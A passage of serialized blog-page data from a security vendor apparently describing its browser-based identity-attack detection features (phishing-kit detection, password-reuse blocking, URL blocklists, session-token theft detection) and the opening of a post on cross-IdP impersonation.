need to be prepared to detect and respond to attacks rather than relying on prevention alone. That said, progress over perfection should always be the aim when it comes to posture management, and shoring up your identity vulnerabilities is an important long-term project. ",[],{},{"nodeType":169,"data":182941,"content":182942},{},[182943],{"nodeType":173,"value":182944,"marks":182945,"data":182946},"Detection and response is the key",[],{},{"nodeType":178,"data":182948,"content":182949},{},[182950],{"nodeType":173,"value":182951,"marks":182952,"data":182953},"Looking at the scale of the challenge, it’s pretty clear that completely scrubbing your workforce identities of all possible vulnerabilities isn’t really an achievable goal. A strong baseline is important, but it will only ever get you so far. Rather than playing whack-a-mole, organizations need to prepare to detect and respond to the techniques and tools being used by attackers when they exploit these vulnerabilities.  ",[],{},{"nodeType":178,"data":182955,"content":182956},{},[182957],{"nodeType":173,"value":182958,"marks":182959,"data":182960},"This is nothing new – this approach has been preached by security operations leaders for more than a decade. But until now, identity security has been much more focused on prevention than detection and response. And with attackers increasingly turning to identity attacks, the sheer volume of identity vulnerabilities (and the rate that they are introduced) means that posture management alone isn’t sufficient.",[],{},{"nodeType":178,"data":182962,"content":182963},{},[182964],{"nodeType":173,"value":182965,"marks":182966,"data":182967},"Like endpoint and network security before, you can no longer rely on prevention alone, and organizations need to ensure they can detect and respond to indicators of identity attacks to be able to manage the risk effectively. ",[],{},{"nodeType":169,"data":182969,"content":182970},{},[182971],{"nodeType":173,"value":1422,"marks":182972,"data":182973},[],{},{"nodeType":178,"data":182975,"content":182976},{},[182977,182981,182989],{"nodeType":173,"value":182978,"marks":182979,"data":182980},"Push helps organizations to detect and prevent identity attacks as they happen, by intercepting and shutting down attacks in the browser. It also provides valuable data to find and fix identity vulnerabilities before they can be exploited. ",[],{},{"nodeType":186,"data":182982,"content":182983},{"uri":473},[182984],{"nodeType":173,"value":182985,"marks":182986,"data":182988},"Book a demo here to find out more.",[182987],{"type":194},{},{"nodeType":173,"value":37,"marks":182990,"data":182991},[],{},{"nodeType":312,"data":182993,"content":182996},{"target":182994},{"sys":182995},{"id":155960,"type":317,"linkType":318},[],{"nodeType":178,"data":182998,"content":182999},{},[183000],{"nodeType":173,"value":37,"marks":183001,"data":183002},[],{},"How many vulnerable identities do you have?","Using Push data to calculate how many vulnerable identities the average organization has, and how they lead to different methods of account takeover. ","2024-10-15T00:00:00.000Z","how-many-vulnerable-identities-do-you-have",{"items":183008},[183009,183011],{"sys":183010,"name":505},{"id":504},{"sys":183012,"name":509},{"id":508},{"items":183014},[183015],{"fullName":1493,"firstName":3975,"jobTitle":1494,"profilePicture":183016},{"url":1496},{"__typename":1528,"sys":183018,"content":183019,"title":496,"synopsis":497,"hashTags":118,"publishedDate":498,"slug":499,"tagsCollection":183293,"authorsCollection":183299},{"id":162},{"json":183020},{"nodeType":165,"data":183021,"content":183022},{},[183023,183029,183045,183058,183064,183070,183073,183079,183085,183133,183139,183144,183147,183153,183159,183165,183171,183177,183191,183196,183202,183208,183222,183227,183233,183239,183245,183251,183257,183260,183266,183282,183287],{"nodeType":169,"data":183024,"content":183025},{},[183026],{"nodeType":173,"value":174,"marks":183027,"data":183028},[],{},{"nodeType":178,"data":183030,"content":183031},{},[183032,183035,183042],{"nodeType":173,"value":182,"marks":183033,"data":183034},[],{},{"nodeType":186,"data":183036,"content":183037},{"uri":188},[183038],{"nodeType":173,"value":191,"marks":183039,"data":183041},[183040],{"type":194},{},{"nodeType":173,"value":197,"marks":183043,"data":183044},[],{},{"nodeType":178,"data":183046,"content":183047},{},[183048,183051,183055],{"nodeType":173,"value":204,"marks":183049,"data":183050},[],{},{"nodeType":173,"value":208,"marks":183052,"data":183054},[183053],{"type":194},{},{"nodeType":173,"value":213,"marks":183056,"data":183057},[],{},{"nodeType":178,"data":183059,"content":183060},{},[183061],{"nodeType":173,"value":220,"marks":183062,"data":183063},[],{},{"nodeType":178,"data":183065,"content":183066},{},[183067],{"nodeType":173,"value":227,"marks":183068,"data":183069},[],{},{"nodeType":231,"data":183071,"content":183072},{},[],{"nodeType":235,"data":183074,"content":183075},{},[183076],{"nodeType":173,"value":239,"marks":183077,"data":183078},[],{},{"nodeType":178,"data":183080,"content":183081},{},[183082],{"nodeType":173,"value":246,"marks":183083,"data":183084},[],{},{"nodeType":250,"data":183086,"content":183087},{},[183088,183097,183106,183115,183124],{"nodeType":254,"data":183089,"content":183090},{},[183091],{"nodeType":178,"data":183092,"content":183093},{},[183094],{"nodeType":173,"value":261,"marks":183095,"data":183096},[],{},{"nodeType":254,"data":183098,"content":183099},{},[183100],{"nodeType":178,"data":183101,"content":183102},{},[183103],{"nodeType":173,"value":271,"marks":183104,"data":183105},[],{},{"nodeType":254,"data":183107,"content":183108},{},[183109],{"nodeType":178,"data":183110,"content":183111},{},[183112],{"nodeType":173,"value":281,"marks":183113,"data":183114},[],{},{"nodeType":254,"data":183116,"content":183117},{},[183118],{"nodeType":178,"data":183119,"content":183120},{},[183121],{"nodeType":173,"value":291,"marks":183122,"data":183123},[],{},{"nodeType":254,"data":183125,"content":183126},{},[183127],{"nodeType":178,"data":183128,"content":183129},{},[183130],{"nodeType":173,"value":301,"marks":183131,"data":183132},[],{},{"nodeType":178,"data":183134,"content":183135},{},[183136],{"nodeType":173,"value":308,"marks":183137,"data":183138},[],{},{"nodeType":312,"data":183140,"content":183143},{"target":183141},{"sys":183142},{"id":316,"type":317,"linkType":318},[],{"nodeType":231,"data":183145,"content":183146},{},[],{"nodeType":235,"data":183148,"content":183149},{},[183150],{"nodeType":173,"value":327,"marks":183151,"data":183152},[],{},{"nodeType":178,"data":183154,"content":183155},{},[183156],{"nodeType":173,"value":334,"marks":183157,"data":183158},[],{},{"nodeType":178,"data":183160,"content":183161},{},[183162],{"nodeType":173,"value":341,"marks":183163,"data":183164},[],{},{"nodeType":178,"data":183166,"content":183167},{},[183168],{"nodeType":173,"value":348,"marks":183169,"data":183170},[],{},{"nodeType":178,"data":183172,"content":183173},{},[183174],{"nodeType":173,"value":355,"marks":183175,"data":183176},[],{},{"nodeType":235,"data":183178,"content":183179},{},[183180,183183,183188],{"nodeType":173,"value":362,"marks":183181,"data":183182},[],{},{"nodeType":173,"value":366,"marks":183184,"data":183187},[183185,183186],{"type":194},{"type":370},{},{"nodeType":173,"value":373,"marks":183189,"data":183190},[],{},{"nodeType":312,"data":183192,"content":183195},{"target":183193},{"sys":183194},{"id":380,"type":317,"linkType":318},[],{"nodeType":178,"data":183197,"content":183198},{},[183199],{"nodeType":173,"value":386,"marks":183200,"data":183201},[],{},{"nodeType":178,"data":183203,"content":183204},{},[183205],{"nodeType":173,"value":393,"marks":183206,"data":183207},[],{},{"nodeType":235,"data":183209,"content":183210},{},[183211,183214,183219],{"nodeType":173,"value":400,"marks":183212,"data":183213},[],{},{"nodeType":173,"value":404,"marks":183215,"data":183218},[183216,183217],{"type":194},{"type":370},{},{"nodeType":173,"value":410,"marks":183220,"data":183221},[],{},{"nodeType":312,"data":183223,"content":183226},{"target":183224},{"sys":183225},{"id":417,"type":317,"linkType":318},[],{"nodeType":178,"data":183228,"content":183229},{},[183230],{"nodeType":173,"value":423,"marks":183231,"data":183232},[],{},{"nodeType":178,"data":183234,"content":183235},{},[183236],{"nodeType":173,"value":430,"marks":183237,"data":183238},[],{},{"nodeType":178,"data":183240,"content":183241},{},[183242],{"nodeType":173,"value":437,"marks":183243,"data":183244},[],{},{"nodeType":178,"data":183246,"content":183247},{},[183248],{"nodeType":173,"value":444,"marks":183249,"data":183250},[],{},{"nodeType":178,"data":183252,"content":183253},{},[183254],{"nodeType":173,"value":451,"marks":183255,"data":183256},[],{},{"nodeType":231,"data":183258,"content":183259},{},[],{"nodeType":169,"data":183261,"content":183262},{},[183263],{"nodeType":173,"value":461,"marks":183264,"data":183265},[],{},{"nodeType":178,"data":183267,"content":183268},{},[183269,183272,183279],{"nodeType":173,"value":468,"marks":183270,"data":183271},[],{},{"nodeType":186,"data":183273,"content":183274},{"uri":473},[183275],{"nodeType":173,"value":476,"marks":183276,"data":183278},[183277],{"type":194},{},{"nodeType":173,"value":481,"marks":183280,"data":183281},[],{},{"nodeType":312,"data":183283,"content":183286},{"target":183284},{"sys":183285},{"id":488,"type":317,"linkType":318},[],{"nodeType":178,"data":183288,"content":183289},{},[183290],{"nodeType":173,"value":37,"marks":183291,"data":183292},[],{},{"items":183294},[183295,183297],{"sys":183296,"name":505},{"id":504},{"sys":183298,"name":509},{"id":508},{"items":183300},[183301],{"fullName":513,"firstName":71176,"jobTitle":514,"profilePicture":183302},{"url":516},{"__typename":1528,"sys":183304,"content":183306,"title":184068,"synopsis":184069,"hashTags":118,"publishedDate":184070,"slug":184071,"tagsCollection":184072,"authorsCollection":184078},{"id":183305},"20FcoPvHu7zXkTQyv9MmK0",{"json":183307},{"nodeType":165,"data":183308,"content":183309},{},[183310,183316,183323,183374,183381,183388,183403,183410,183417,183498,183505,183510,183517,183524,183539,183546,183552,183575,183597,183602,183620,183626,183633,183663,183670,183677,183683,183700,183706,183713,183720,183727,183733,183751,183758,183765,183772,183779,183785,183802,183808,183815,183821,183838,183845,183852,183859,183901,183908,183978,183993,183999,184006,184013,184020,184027,184045,184051],{"nodeType":312,"data":183311,"content":183315},{"target":183312},{"sys":183313},{"id":183314,"type":317,"linkType":318},"7rud2H1hcTAOhxh9zHzxP6",[],{"nodeType":178,"data":183317,"content":183318},{},[183319],{"nodeType":173,"value":183320,"marks":183321,"data":183322},"If someone asked you where you work, you probably wouldn’t answer, “My browser.” But that would be the truth.",[],{},{"nodeType":178,"data":183324,"content":183325},{},[183326,183330,183338,183341,183349,183352,183359,183362,183370],{"nodeType":173,"value":183327,"marks":183328,"data":183329},"(Threat actors already know where you work, of course, and they’ve been capitalizing on the massive shift to cloud-based workforces. Just look at any of the ",[],{},{"nodeType":186,"data":183331,"content":183333},{"uri":183332},"https://www.crowdstrike.com/global-threat-report/",[183334],{"nodeType":173,"value":183335,"marks":183336,"data":183337},"latest",[],{},{"nodeType":173,"value":3107,"marks":183339,"data":183340},[],{},{"nodeType":186,"data":183342,"content":183344},{"uri":183343},"https://redcanary.com/threat-detection-report/techniques/cloud-accounts/",[183345],{"nodeType":173,"value":183346,"marks":183347,"data":183348},"threat",[],{},{"nodeType":173,"value":3107,"marks":183350,"data":183351},[],{},{"nodeType":186,"data":183353,"content":183354},{"uri":1297},[183355],{"nodeType":173,"value":183356,"marks":183357,"data":183358},"research",[],{},{"nodeType":173,"value":3107,"marks":183360,"data":183361},[],{},{"nodeType":186,"data":183363,"content":183365},{"uri":183364},"https://www.lab539.com/blog/6-months-tracking-aitm-campaigns",[183366],{"nodeType":173,"value":183367,"marks":183368,"data":183369},"reports",[],{},{"nodeType":173,"value":183371,"marks":183372,"data":183373}," on identity-based attacks to see how good a job they’ve been doing.)",[],{},{"nodeType":178,"data":183375,"content":183376},{},[183377],{"nodeType":173,"value":183378,"marks":183379,"data":183380},"To get visibility of your infrastructure in order to build a strong detection and response program, the equation used to look something like:",[],{},{"nodeType":178,"data":183382,"content":183383},{},[183384],{"nodeType":173,"value":183385,"marks":183386,"data":183387},"Network traffic + Logs + Endpoints = Profit!",[],{},{"nodeType":178,"data":183389,"content":183390},{},[183391,183395,183400],{"nodeType":173,"value":183392,"marks":183393,"data":183394},"But now there’s a missing piece, as identity infrastructure sprawls across IdPs, core apps, shadow SaaS and third-party integrations: ",[],{},{"nodeType":173,"value":183396,"marks":183397,"data":183399},"Browser telemetry",[183398],{"type":370},{},{"nodeType":173,"value":1477,"marks":183401,"data":183402},[],{},{"nodeType":178,"data":183404,"content":183405},{},[183406],{"nodeType":173,"value":183407,"marks":183408,"data":183409},"As a browser agent, Push is uniquely positioned to provide telemetry you can’t easily get anywhere else. We believe that this missing piece is the key to stopping identity attacks by providing the context both for first-class detections and security controls, as well as key correlations for events you observe in traditional log sources.",[],{},{"nodeType":178,"data":183411,"content":183412},{},[183413],{"nodeType":173,"value":183414,"marks":183415,"data":183416},"Now we have a better way to bring Push’s data to life to solve meaningful security challenges:",[],{},{"nodeType":250,"data":183418,"content":183419},{},[183420,183449],{"nodeType":254,"data":183421,"content":183422},{},[183423],{"nodeType":178,"data":183424,"content":183425},{},[183426,183431,183435,183445],{"nodeType":173,"value":183427,"marks":183428,"data":183430},"Plug-and-play security controls",[183429],{"type":370},{},{"nodeType":173,"value":183432,"marks":183433,"data":183434},", accessible from the new ",[],{},{"nodeType":1698,"data":183436,"content":183440},{"target":183437},{"sys":183438},{"id":183439,"type":317,"linkType":318},"BtDLgVZRWQ3Ov4WgDQX1W",[183441],{"nodeType":173,"value":18649,"marks":183442,"data":183444},[183443],{"type":370},{},{"nodeType":173,"value":183446,"marks":183447,"data":183448}," page in the Push platform",[],{},{"nodeType":254,"data":183450,"content":183451},{},[183452],{"nodeType":178,"data":183453,"content":183454},{},[183455,183460,183464,183472,183475,183482,183486,183494],{"nodeType":173,"value":183456,"marks":183457,"data":183459},"Choose-your-own-adventure tooling",[183458],{"type":370},{},{"nodeType":173,"value":183461,"marks":183462,"data":183463},", including a ",[],{},{"nodeType":186,"data":183465,"content":183467},{"uri":183466},"https://pushsecurity.redoc.ly/rest-v1/",[183468],{"nodeType":173,"value":183469,"marks":183470,"data":183471},"REST API",[],{},{"nodeType":173,"value":2936,"marks":183473,"data":183474},[],{},{"nodeType":186,"data":183476,"content":183477},{"uri":114007},[183478],{"nodeType":173,"value":183479,"marks":183480,"data":183481},"webhooks",[],{},{"nodeType":173,"value":183483,"marks":183484,"data":183485},", and a new ",[],{},{"nodeType":186,"data":183487,"content":183489},{"uri":183488},"/help/audience/administrators/docs/connect-to-siem-or-soar/#using-the-events-page",[183490],{"nodeType":173,"value":2718,"marks":183491,"data":183493},[183492],{"type":370},{},{"nodeType":173,"value":183495,"marks":183496,"data":183497}," page to help you visualize and build custom detections and automations.",[],{},{"nodeType":178,"data":183499,"content":183500},{},[183501],{"nodeType":173,"value":183502,"marks":183503,"data":183504},"Let’s take a closer look.",[],{},{"nodeType":312,"data":183506,"content":183509},{"target":183507},{"sys":183508},{"id":169040,"type":317,"linkType":318},[],{"nodeType":169,"data":183511,"content":183512},{},[183513],{"nodeType":173,"value":183514,"marks":183515,"data":183516},"Plug-and-play controls",[],{},{"nodeType":178,"data":183518,"content":183519},{},[183520],{"nodeType":173,"value":183521,"marks":183522,"data":183523},"Security visibility without security control is a recipe for a stress headache, so we’re big believers in providing meaningful interventions that are easy to use.",[],{},{"nodeType":178,"data":183525,"content":183526},{},[183527,183531,183535],{"nodeType":173,"value":183528,"marks":183529,"data":183530},"With the new ",[],{},{"nodeType":173,"value":18649,"marks":183532,"data":183534},[183533],{"type":370},{},{"nodeType":173,"value":183536,"marks":183537,"data":183538}," page in the Push admin console, you can now find these preconfigured detections and interventions in one place. They cover use cases that any organization can benefit from, and take a unique browser-based approach to solving some thorny issues.",[],{},{"nodeType":178,"data":183540,"content":183541},{},[183542],{"nodeType":173,"value":183543,"marks":183544,"data":183545},"These controls include:",[],{},{"nodeType":235,"data":183547,"content":183548},{},[183549],{"nodeType":173,"value":24345,"marks":183550,"data":183551},[],{},{"nodeType":178,"data":183553,"content":183554},{},[183555,183559,183564,183567,183572],{"nodeType":173,"value":183556,"marks":183557,"data":183558},"Detect and block when employees visit webpages that use advanced phishing tools such as Evilginx or EvilNoVNC, among others. These adversary-in-the-middle (AitM) toolkits can mimic legitimate login screens, such as an Okta login page, to steal ",[],{},{"nodeType":173,"value":183560,"marks":183561,"data":183563},"credentials",[183562],{"type":370},{},{"nodeType":173,"value":933,"marks":183565,"data":183566},[],{},{"nodeType":173,"value":183568,"marks":183569,"data":183571},"MFA codes",[183570],{"type":370},{},{"nodeType":173,"value":1477,"marks":183573,"data":183574},[],{},{"nodeType":178,"data":183576,"content":183577},{},[183578,183582,183586,183589,183593],{"nodeType":173,"value":183579,"marks":183580,"data":183581},"Push emits a webhook event when the browser agent detects attributes of these malware. You can also set Push to ",[],{},{"nodeType":173,"value":2740,"marks":183583,"data":183585},[183584],{"type":370},{},{"nodeType":173,"value":1464,"marks":183587,"data":183588},[],{},{"nodeType":173,"value":2748,"marks":183590,"data":183592},[183591],{"type":370},{},{"nodeType":173,"value":183594,"marks":183595,"data":183596}," mode to display a customizable message to end-users when they encounter a phishing site.",[],{},{"nodeType":312,"data":183598,"content":183601},{"target":183599},{"sys":183600},{"id":156217,"type":317,"linkType":318},[],{"nodeType":178,"data":183603,"content":183604},{},[183605,183609,183617],{"nodeType":173,"value":183606,"marks":183607,"data":183608},"More about ",[],{},{"nodeType":1698,"data":183610,"content":183613},{"target":183611},{"sys":183612},{"id":2148,"type":317,"linkType":318},[183614],{"nodeType":173,"value":65996,"marks":183615,"data":183616},[],{},{"nodeType":173,"value":37,"marks":183618,"data":183619},[],{},{"nodeType":235,"data":183621,"content":183622},{},[183623],{"nodeType":173,"value":125683,"marks":183624,"data":183625},[],{},{"nodeType":178,"data":183627,"content":183628},{},[183629],{"nodeType":173,"value":183630,"marks":183631,"data":183632},"Prevent employees from reusing their corporate SSO password on any page that doesn’t belong to the identity provider, including phishing sites. This means that even if that employee was the first person to get phished using a new attacker site, Push still detects it and blocks it.",[],{},{"nodeType":178,"data":183634,"content":183635},{},[183636,183640,183644,183647,183651,183655,183659],{"nodeType":173,"value":183637,"marks":183638,"data":183639},"Customize the message that end-users see in ",[],{},{"nodeType":173,"value":2740,"marks":183641,"data":183643},[183642],{"type":370},{},{"nodeType":173,"value":1464,"marks":183645,"data":183646},[],{},{"nodeType":173,"value":2748,"marks":183648,"data":183650},[183649],{"type":370},{},{"nodeType":173,"value":183652,"marks":183653,"data":183654}," mode, or start out in ",[],{},{"nodeType":173,"value":2701,"marks":183656,"data":183658},[183657],{"type":370},{},{"nodeType":173,"value":183660,"marks":183661,"data":183662}," mode to catch any false positives before you enforce the control.",[],{},{"nodeType":178,"data":183664,"content":183665},{},[183666],{"nodeType":173,"value":183667,"marks":183668,"data":183669},"This feature supports the following identity providers: Okta, Microsoft 365, Google Workspace, JumpCloud, Duo, and Ping Identity.",[],{},{"nodeType":178,"data":183671,"content":183672},{},[183673],{"nodeType":173,"value":183674,"marks":183675,"data":183676},"Push will also emit a webhook event when an SSO password is used, and if an employee clicks through the warning screen.",[],{},{"nodeType":312,"data":183678,"content":183682},{"target":183679},{"sys":183680},{"id":183681,"type":317,"linkType":318},"25c8M2gWYFST7yYxGEji2s",[],{"nodeType":178,"data":183684,"content":183685},{},[183686,183689,183697],{"nodeType":173,"value":183606,"marks":183687,"data":183688},[],{},{"nodeType":1698,"data":183690,"content":183693},{"target":183691},{"sys":183692},{"id":2405,"type":317,"linkType":318},[183694],{"nodeType":173,"value":125683,"marks":183695,"data":183696},[],{},{"nodeType":173,"value":37,"marks":183698,"data":183699},[],{},{"nodeType":235,"data":183701,"content":183702},{},[183703],{"nodeType":173,"value":157048,"marks":183704,"data":183705},[],{},{"nodeType":178,"data":183707,"content":183708},{},[183709],{"nodeType":173,"value":183710,"marks":183711,"data":183712},"When you find malicious sites you want to block, such as when responding to a phishing incident, add them to a blocklist and prevent other employees from accessing those sites. ",[],{},{"nodeType":178,"data":183714,"content":183715},{},[183716],{"nodeType":173,"value":183717,"marks":183718,"data":183719},"URL blocking can be used in tandem with Push’s anti-phishing controls, so that as you discover malicious sites, you can block them from a central blocklist. This offers a kind of herd immunity where you can block other users from visiting a malicious site as soon as you have a single incident.",[],{},{"nodeType":178,"data":183721,"content":183722},{},[183723],{"nodeType":173,"value":183724,"marks":183725,"data":183726},"You can programmatically manage the blocklist using the Push REST API or sync to other threat intelligence sources you consume.",[],{},{"nodeType":312,"data":183728,"content":183732},{"target":183729},{"sys":183730},{"id":183731,"type":317,"linkType":318},"3m00cFiUDAnddsOBOpkeiZ",[],{"nodeType":178,"data":183734,"content":183735},{},[183736,183739,183748],{"nodeType":173,"value":183606,"marks":183737,"data":183738},[],{},{"nodeType":1698,"data":183740,"content":183744},{"target":183741},{"sys":183742},{"id":183743,"type":317,"linkType":318},"P0coHgQAdRL0YTu4Rwd4z",[183745],{"nodeType":173,"value":157048,"marks":183746,"data":183747},[],{},{"nodeType":173,"value":37,"marks":183749,"data":183750},[],{},{"nodeType":235,"data":183752,"content":183753},{},[183754],{"nodeType":173,"value":183755,"marks":183756,"data":183757},"Session token theft detection",[],{},{"nodeType":178,"data":183759,"content":183760},{},[183761],{"nodeType":173,"value":183762,"marks":183763,"data":183764},"Inject a unique marker provided by the Push browser agent into the User Agent string of sessions that occur in browsers enrolled in Push. ",[],{},{"nodeType":178,"data":183766,"content":183767},{},[183768],{"nodeType":173,"value":183769,"marks":183770,"data":183771},"By analyzing logs from your IdP, you can identify activity from the same session that both has the Push marker and that lacks the marker. This can only ever happen when a session is extracted from a browser and maliciously imported into a different browser.",[],{},{"nodeType":178,"data":183773,"content":183774},{},[183775],{"nodeType":173,"value":183776,"marks":183777,"data":183778},"This is a high-fidelity signal that a session token has been stolen and is being used.",[],{},{"nodeType":312,"data":183780,"content":183784},{"target":183781},{"sys":183782},{"id":183783,"type":317,"linkType":318},"43rk3TCqN269Vr2YWT4llP",[],{"nodeType":178,"data":183786,"content":183787},{},[183788,183791,183799],{"nodeType":173,"value":183606,"marks":183789,"data":183790},[],{},{"nodeType":1698,"data":183792,"content":183795},{"target":183793},{"sys":183794},{"id":114256,"type":317,"linkType":318},[183796],{"nodeType":173,"value":114259,"marks":183797,"data":183798},[],{},{"nodeType":173,"value":37,"marks":183800,"data":183801},[],{},{"nodeType":235,"data":183803,"content":183804},{},[183805],{"nodeType":173,"value":2631,"marks":183806,"data":183807},[],{},{"nodeType":178,"data":183809,"content":183810},{},[183811],{"nodeType":173,"value":183812,"marks":183813,"data":183814},"Add guardrails to employees’ use of SaaS apps with in-browser app banner messages you customize with your own text. You can require users to acknowledge having read a message before they can access an app, or even require them to submit a reason for using an app before they can log in.",[],{},{"nodeType":312,"data":183816,"content":183820},{"target":183817},{"sys":183818},{"id":183819,"type":317,"linkType":318},"5nEKTBz6mauHI5mg8jB4ea",[],{"nodeType":178,"data":183822,"content":183823},{},[183824,183827,183835],{"nodeType":173,"value":183606,"marks":183825,"data":183826},[],{},{"nodeType":1698,"data":183828,"content":183831},{"target":183829},{"sys":183830},{"id":2466,"type":317,"linkType":318},[183832],{"nodeType":173,"value":126474,"marks":183833,"data":183834},[],{},{"nodeType":173,"value":37,"marks":183836,"data":183837},[],{},{"nodeType":169,"data":183839,"content":183840},{},[183841],{"nodeType":173,"value":183842,"marks":183843,"data":183844},"Choose your own adventure",[],{},{"nodeType":178,"data":183846,"content":183847},{},[183848],{"nodeType":173,"value":183849,"marks":183850,"data":183851},"Want to do something creative? We've got you covered. Push provides a wealth of raw telemetry via the Push REST API and webhook events. Use this data to build both proactive and reactive security operations workflows, or add missing context to other sources, such as your IdP, application, or endpoint logs.",[],{},{"nodeType":178,"data":183853,"content":183854},{},[183855],{"nodeType":173,"value":183856,"marks":183857,"data":183858},"You can use this browser telemetry to:",[],{},{"nodeType":250,"data":183860,"content":183861},{},[183862,183875,183888],{"nodeType":254,"data":183863,"content":183864},{},[183865],{"nodeType":178,"data":183866,"content":183867},{},[183868,183872],{"nodeType":173,"value":157359,"marks":183869,"data":183871},[183870],{"type":370},{},{"nodeType":173,"value":157364,"marks":183873,"data":183874},[],{},{"nodeType":254,"data":183876,"content":183877},{},[183878],{"nodeType":178,"data":183879,"content":183880},{},[183881,183885],{"nodeType":173,"value":157374,"marks":183882,"data":183884},[183883],{"type":370},{},{"nodeType":173,"value":157379,"marks":183886,"data":183887},[],{},{"nodeType":254,"data":183889,"content":183890},{},[183891],{"nodeType":178,"data":183892,"content":183893},{},[183894,183898],{"nodeType":173,"value":157389,"marks":183895,"data":183897},[183896],{"type":370},{},{"nodeType":173,"value":157394,"marks":183899,"data":183900},[],{},{"nodeType":178,"data":183902,"content":183903},{},[183904],{"nodeType":173,"value":183905,"marks":183906,"data":183907},"In the “make my life easier” category, you can also use Push telemetry to:",[],{},{"nodeType":250,"data":183909,"content":183910},{},[183911,183929,183948,183963],{"nodeType":254,"data":183912,"content":183913},{},[183914],{"nodeType":178,"data":183915,"content":183916},{},[183917,183921,183926],{"nodeType":173,"value":183918,"marks":183919,"data":183920},"Automate a workflow ",[],{},{"nodeType":173,"value":183922,"marks":183923,"data":183925},"showing you all the accounts and apps used by an offboarded employee",[183924],{"type":370},{},{"nodeType":173,"value":157428,"marks":183927,"data":183928},[],{},{"nodeType":254,"data":183930,"content":183931},{},[183932],{"nodeType":178,"data":183933,"content":183934},{},[183935,183939,183944],{"nodeType":173,"value":183936,"marks":183937,"data":183938},"Automate a workflow to",[],{},{"nodeType":173,"value":183940,"marks":183941,"data":183943}," revoke licenses on SaaS after a period of inactivity",[183942],{"type":370},{},{"nodeType":173,"value":183945,"marks":183946,"data":183947},", saving money.",[],{},{"nodeType":254,"data":183949,"content":183950},{},[183951],{"nodeType":178,"data":183952,"content":183953},{},[183954,183959],{"nodeType":173,"value":183955,"marks":183956,"data":183958},"Build an approved apps list in your company wiki",[183957],{"type":370},{},{"nodeType":173,"value":183960,"marks":183961,"data":183962},", synced from Push’s source of truth.",[],{},{"nodeType":254,"data":183964,"content":183965},{},[183966],{"nodeType":178,"data":183967,"content":183968},{},[183969,183974],{"nodeType":173,"value":183970,"marks":183971,"data":183973},"Force-reset an IdP password if Push finds a compromised password",[183972],{"type":370},{},{"nodeType":173,"value":183975,"marks":183976,"data":183977}," on an employee account.",[],{},{"nodeType":178,"data":183979,"content":183980},{},[183981,183985,183989],{"nodeType":173,"value":183982,"marks":183983,"data":183984},"To help you visualize and plan how you will use this telemetry, Push also provides an ",[],{},{"nodeType":173,"value":2718,"marks":183986,"data":183988},[183987],{"type":370},{},{"nodeType":173,"value":183990,"marks":183991,"data":183992}," page in the admin console with a rolling 7-day snapshot of all the events in your environment.",[],{},{"nodeType":312,"data":183994,"content":183998},{"target":183995},{"sys":183996},{"id":183997,"type":317,"linkType":318},"2a3bJ5sN8dJ0c1kQtZiag7",[],{"nodeType":178,"data":184000,"content":184001},{},[184002],{"nodeType":173,"value":184003,"marks":184004,"data":184005},"The Events page can help you see real-world examples, understand the attributes of each event, and gauge event volume before you ingest data into a SIEM or other platform.",[],{},{"nodeType":169,"data":184007,"content":184008},{},[184009],{"nodeType":173,"value":184010,"marks":184011,"data":184012},"What if you don’t have a SIEM?",[],{},{"nodeType":178,"data":184014,"content":184015},{},[184016],{"nodeType":173,"value":184017,"marks":184018,"data":184019},"While you’d need a SIEM for writing detections and performing log correlations, you can still get a lot of value out of Push telemetry if you don’t have one.",[],{},{"nodeType":178,"data":184021,"content":184022},{},[184023],{"nodeType":173,"value":184024,"marks":184025,"data":184026},"Use Push’s webhook events to send alerts directly to your Slack, Teams, or other chat platform, or build workflows that hook into your ticketing system or SOAR platform.",[],{},{"nodeType":178,"data":184028,"content":184029},{},[184030,184034,184041],{"nodeType":173,"value":184031,"marks":184032,"data":184033},"Review our ",[],{},{"nodeType":186,"data":184035,"content":184036},{"uri":114007},[184037],{"nodeType":173,"value":184038,"marks":184039,"data":184040},"webhooks documentation",[],{},{"nodeType":173,"value":184042,"marks":184043,"data":184044}," for a list of events.",[],{},{"nodeType":169,"data":184046,"content":184047},{},[184048],{"nodeType":173,"value":71801,"marks":184049,"data":184050},[],{},{"nodeType":178,"data":184052,"content":184053},{},[184054,184058,184064],{"nodeType":173,"value":184055,"marks":184056,"data":184057},"If you want to see Push in action, ",[],{},{"nodeType":186,"data":184059,"content":184060},{"uri":114457},[184061],{"nodeType":173,"value":88194,"marks":184062,"data":184063},[],{},{"nodeType":173,"value":184065,"marks":184066,"data":184067},". We’ll be happy to show you these features, along with how we discover all the apps your employees are using — even the ones not behind SSO.",[],{},"Introducing set-and-forget controls that stop real-world identity attacks","Enable detections and interventions in the browser using Push’s new security controls.","2024-07-02T00:00:00.000Z","introducing-set-and-forget-controls-that-stop-real-world-identity-attacks",{"items":184073},[184074,184076],{"sys":184075,"name":18399},{"id":18398},{"sys":184077,"name":509},{"id":508},{"items":184079},[184080],{"fullName":2908,"firstName":2909,"jobTitle":514,"profilePicture":184081},{"url":2911},{"items":184083},[184084],{"fullName":118109,"firstName":118110,"jobTitle":118111,"profilePicture":184085},{"url":118113},"content:blog:why-im-joining-push-security-the-team-redefining-itdr.json","blog/why-im-joining-push-security-the-team-redefining-itdr.json","blog/why-im-joining-push-security-the-team-redefining-itdr",{"_path":184090,"_dir":1500,"_draft":6,"_partial":6,"_locale":37,"sys":184091,"summary":184093,"title":180158,"subtitle":118,"metaTitle":184104,"synopsis":180159,"hashTags":118,"publishedDate":180160,"slug":180161,"ogImage":184105,"tagsCollection":184107,"relatedBlogPostsCollection":184113,"authorsCollection":185748,"content":185752,"_id":186557,"_type":5439,"_source":5440,"_file":186558,"_stem":186559,"_extension":5439},"/blog/cross-idp-impersonation",{"id":179270,"publishedAt":184092},"2024-11-25T09:54:10.238Z",{"json":184094},{"data":184095,"content":184096,"nodeType":165},{},[184097],{"data":184098,"content":184099,"nodeType":178},{},[184100],{"data":184101,"marks":184102,"value":184103,"nodeType":173},{},[],"Cross-IdP impersonation is a growing trend as a method of hijacking SSO to access downstream apps — without needing to compromise accounts on your company’s main IdP. ","Cross-IdP impersonation: hijacking SSO using fraudulent 